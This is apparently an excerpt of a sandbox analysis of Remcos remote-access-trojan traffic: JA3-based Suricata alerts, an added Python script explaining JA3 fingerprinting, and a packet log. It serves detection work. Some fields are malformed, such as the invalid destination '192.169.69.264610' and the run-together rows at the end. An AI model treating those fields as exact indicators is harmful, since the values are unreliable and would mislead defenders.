2024-12-17T19:47:32.137548+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49742 | 192.169.69.264610 | TCP
2024-12-17T19:47:45.660104+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49776 | 192.169.69.264610 | TCP
2024-12-17T19:47:59.101670+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49808 | 192.169.69.264610 | TCP
2024-12-17T19:48:12.620564+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49841 | 192.169.69.264610 | TCP
2024-12-17T19:48:26.454189+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49874 | 192.169.69.264610 | TCP
2024-12-17T19:48:40.016570+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49907 | 192.169.69.264610 | TCP
2024-12-17T19:48:53.595546+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49939 | 192.169.69.264610 | TCP
2024-12-17T19:49:07.185091+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49972 | 192.169.69.264610 | TCP
2024-12-17T19:49:20.695746+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50004 | 192.169.69.264610 | TCP
2024-12-17T19:49:34.539024+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50007 | 192.169.69.264610 | TCP
2024-12-17T19:49:48.249996+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50009 | 192.169.69.264610 | TCP
2024-12-17T19:50:01.813406+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50011 | 192.169.69.264610 | TCP
2024-12-17T19:50:15.367649+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50013 | 192.169.69.264610 | TCP
2024-12-17T19:50:28.914990+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50015 | 192.169.69.264610 | TCP
2024-12-17T19:50:42.759117+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50017 | 192.169.69.264610 | TCP
2024-12-17T19:50:56.293614+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50019 | 192.169.69.264610 | TCP
2024-12-17T19:51:09.722195+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50022 | 192.169.69.264610 | TCP
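Both Suricata signatures above are "ET JA3 Hash" rules: they match the MD5 of a string assembled from five fields of the TLS ClientHello (protocol version, cipher suites, extension types, supported groups, EC point formats), so they fire on the TLS client stack that the malware links against rather than on anything in the encrypted payload. That is why the report ranks the two hits differently: the generic "Fake Firefox Font Update" fingerprint is shared by many clients (severity 3), while the Remcos fingerprint is specific enough to be treated as a confident match (severity 1). The script below is an added example and not code from the report, from Joe Sandbox or from the JA3 project: it derives the JA3 string and hash from a raw ClientHello record, skipping GREASE values as JA3 requires and handling clients that send no supported-groups or point-format extensions. The ClientHello bytes, extension payloads and cipher list are constructed for the demo and do not reproduce the sample's fingerprint.

```python
"""JA3 fingerprint of a TLS ClientHello, standard library only.

Added example, not code from the report, from Joe Sandbox or from the JA3
project: both Suricata hits above are "ET JA3 Hash" rules, i.e. the MD5 of a
string built from five ClientHello fields. This shows how that string is
derived, including GREASE filtering and the empty-field cases. The
ClientHello bytes are constructed here and do not reproduce the sample's
real fingerprint.
"""
import hashlib
import struct

GREASE = {0x0A0A + 0x1010 * i for i in range(16)}   # RFC 8701 reserved values, skipped by JA3


def _u16_list(buf: bytes) -> list:
    return [v for (v,) in struct.iter_unpack(">H", buf) if v not in GREASE]


def _dash(values) -> str:
    return "-".join(str(v) for v in values)


def ja3_string(record: bytes) -> str:
    """'version,ciphers,extensions,groups,point_formats' for one ClientHello record."""
    ctype, _record_version, rlen = struct.unpack_from(">BHH", record, 0)
    body = record[5:5 + rlen]
    if ctype != 0x16 or body[:1] != b"\x01":
        raise ValueError("not a ClientHello handshake record")
    p = 4                                           # handshake type + 3-byte length
    version, = struct.unpack_from(">H", body, p); p += 2
    p += 32                                         # client random
    p += 1 + body[p]                                # session id
    cs_len, = struct.unpack_from(">H", body, p); p += 2
    ciphers = _u16_list(body[p:p + cs_len]); p += cs_len
    p += 1 + body[p]                                # compression methods
    exts, groups, formats = [], [], []
    if p + 2 <= len(body):                          # the extension block is optional
        ext_len, = struct.unpack_from(">H", body, p); p += 2
        end = p + ext_len
        while p + 4 <= end:
            etype, elen = struct.unpack_from(">HH", body, p); p += 4
            edata = body[p:p + elen]; p += elen
            if etype in GREASE:
                continue
            exts.append(etype)
            if etype == 10:                         # supported_groups: u16 length, u16 entries
                n, = struct.unpack_from(">H", edata, 0)
                groups = _u16_list(edata[2:2 + n])
            elif etype == 11:                       # ec_point_formats: u8 length, u8 entries
                formats = list(edata[1:1 + edata[0]])
    return f"{version},{_dash(ciphers)},{_dash(exts)},{_dash(groups)},{_dash(formats)}"


def ja3_hash(record: bytes) -> str:
    """The value an IDS rule compares against: MD5 of the JA3 string, lowercase hex."""
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


def build_client_hello(ciphers, extensions) -> bytes:
    """Constructed TLS 1.2-style ClientHello; extensions is a list of (type, raw data)."""
    cs = b"".join(struct.pack(">H", c) for c in ciphers)
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    hello = (struct.pack(">H", 0x0303) + bytes(32) + b"\x00"        # version, random, empty session id
             + struct.pack(">H", len(cs)) + cs + b"\x01\x00"          # cipher suites, null compression
             + struct.pack(">H", len(ext)) + ext)
    handshake = b"\x01" + len(hello).to_bytes(3, "big") + hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


# Constructed extension payloads; the values are demo choices, not taken from the sample.
SNI = struct.pack(">HBH", 14, 0, 11) + b"example.com"
GROUPS = struct.pack(">HHHH", 6, 0x001D, 0x0017, 0x0018)             # x25519, secp256r1, secp384r1
POINT_FORMATS = b"\x01\x00"                                           # uncompressed only
SIG_ALGS = struct.pack(">HHH", 4, 0x0403, 0x0804)

DEMO_HELLO = build_client_hello(
    [0x0A0A, 0xC02B, 0xC02F, 0x009C, 0x002F, 0x000A],                  # leading 0x0A0A is GREASE
    [(0x1A1A, b""), (0, SNI), (10, GROUPS), (11, POINT_FORMATS), (13, SIG_ALGS), (23, b"")])
NO_EC_HELLO = build_client_hello([0xC02B], [(0, SNI), (23, b"")])     # no groups / point-format extensions
BARE_HELLO = build_client_hello([0x002F], [])                         # no extensions at all

if __name__ == "__main__":
    for label, rec in (("demo", DEMO_HELLO), ("no-ec", NO_EC_HELLO), ("bare", BARE_HELLO)):
        print(f"{label:<6} {ja3_string(rec)}  ->  {ja3_hash(rec)}")
```

The practical caveat when reading hits like the ones above: the same JA3 value is produced by every program that uses the same TLS library with the same settings, so a fingerprint rule is strong evidence only when the fingerprint is rare, and it cannot be tuned to a single sample. Pairing the hit with the regular reconnect pattern visible in the timestamps above is what turns it into a usable detection.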
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 19:47:01.239001989 CET | 49707 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.239075899 CET | 443 | 49707 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:01.239162922 CET | 49707 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.239902020 CET | 49707 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.239981890 CET | 443 | 49707 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:01.240107059 CET | 49707 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.263341904 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.263376951 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:01.263609886 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.267194986 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:01.267210007 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.077106953 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.077202082 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.080809116 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.080817938 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.081185102 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.130989075 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.200820923 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.243328094 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.587605953 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.587668896 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.587722063 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.587735891 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.611759901 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.611783981 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.611828089 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.611840963 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.611860037 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.657984972 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.754180908 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.754209042 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.754357100 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.754407883 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.754465103 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.903702974 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.903738022 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.903776884 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.903805971 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.903862953 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994288921 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994314909 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994405985 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994416952 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994453907 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994509935 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994515896 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994524002 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994548082 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994589090 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994646072 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994651079 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994712114 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:03.994765043 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:03.994770050 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.017508030 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.017591000 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.017604113 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.057991982 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.115005016 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.115020990 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.115052938 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.115140915 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.115190983 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.136625051 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.136641026 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.136694908 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.136732101 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.136739016 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.149179935 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.149255991 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.149260998 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.149295092 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.149322033 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.166390896 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.166445017 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.166474104 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.166486025 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.166513920 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.178325891 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.178385019 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.178594112 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.178602934 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.191016912 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.191040993 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.191104889 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.191123009 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.207823038 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.207840919 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.208113909 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.208127975 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.220690966 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.220706940 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.220861912 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.220881939 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.232969999 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.232989073 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.233002901 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.233028889 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.233047009 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.233064890 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.249815941 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.249849081 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.249908924 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.249924898 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.249963045 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.262336969 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.262357950 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.262408972 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.262418985 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.262461901 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.274909019 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.274929047 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.275027037 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.275033951 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.275199890 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.289644003 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.289659023 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.289757967 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.289763927 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.305705070 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.305794954 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.305802107 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.316291094 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.316356897 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.316365004 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.316414118 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.316425085 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.326658010 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.326719046 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.326730013 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.326741934 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.326772928 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.355144978 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.355247021 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.355375051 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.355376005 CET | 49708 | 443 | 192.168.2.6 | 23.237.50.106
Dec 17, 2024 19:47:04.355397940 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.367707968 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
Dec 17, 2024 19:47:04.367728949 CET | 443 | 49708 | 23.237.50.106 | 192.168.2.6
                                      Dec 17, 2024 19:47:04.367887974 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.367887974 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.367893934 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372307062 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372327089 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372375965 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.372381926 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372412920 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.376640081 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376693964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376718998 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.376724005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376756907 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.382622957 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.382711887 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.382718086 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.387022018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.387087107 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.387092113 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.391547918 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.391618013 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.391623020 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.397484064 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.397552013 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.397557020 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.402426958 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.402496099 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.402501106 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.406450033 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.406516075 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.406521082 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.412211895 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.412285089 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.412290096 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.416893005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.416979074 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.416985035 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.421967030 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.422044039 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.422049046 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.426280022 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.426381111 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.426400900 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.432501078 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.432580948 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.432586908 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.436850071 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.436933994 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.436939955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.441024065 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.441098928 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.441103935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.446578026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.446650028 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.446655989 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.475833893 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.475944042 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.475949049 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481066942 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481077909 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481148958 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.481153965 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484678030 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484689951 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484749079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.484755039 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.543695927 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.547763109 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547774076 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547823906 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547832966 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.547890902 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.550642967 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550649881 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550688982 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550697088 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.550734997 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.552711010 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.552720070 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.552783012 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.552793026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555161953 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555171013 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555226088 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.555233955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558047056 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558092117 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558114052 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.558121920 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558149099 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.560425997 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.560503960 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.560509920 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.562666893 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.562726021 CET49708443192.168.2.623.237.50.106
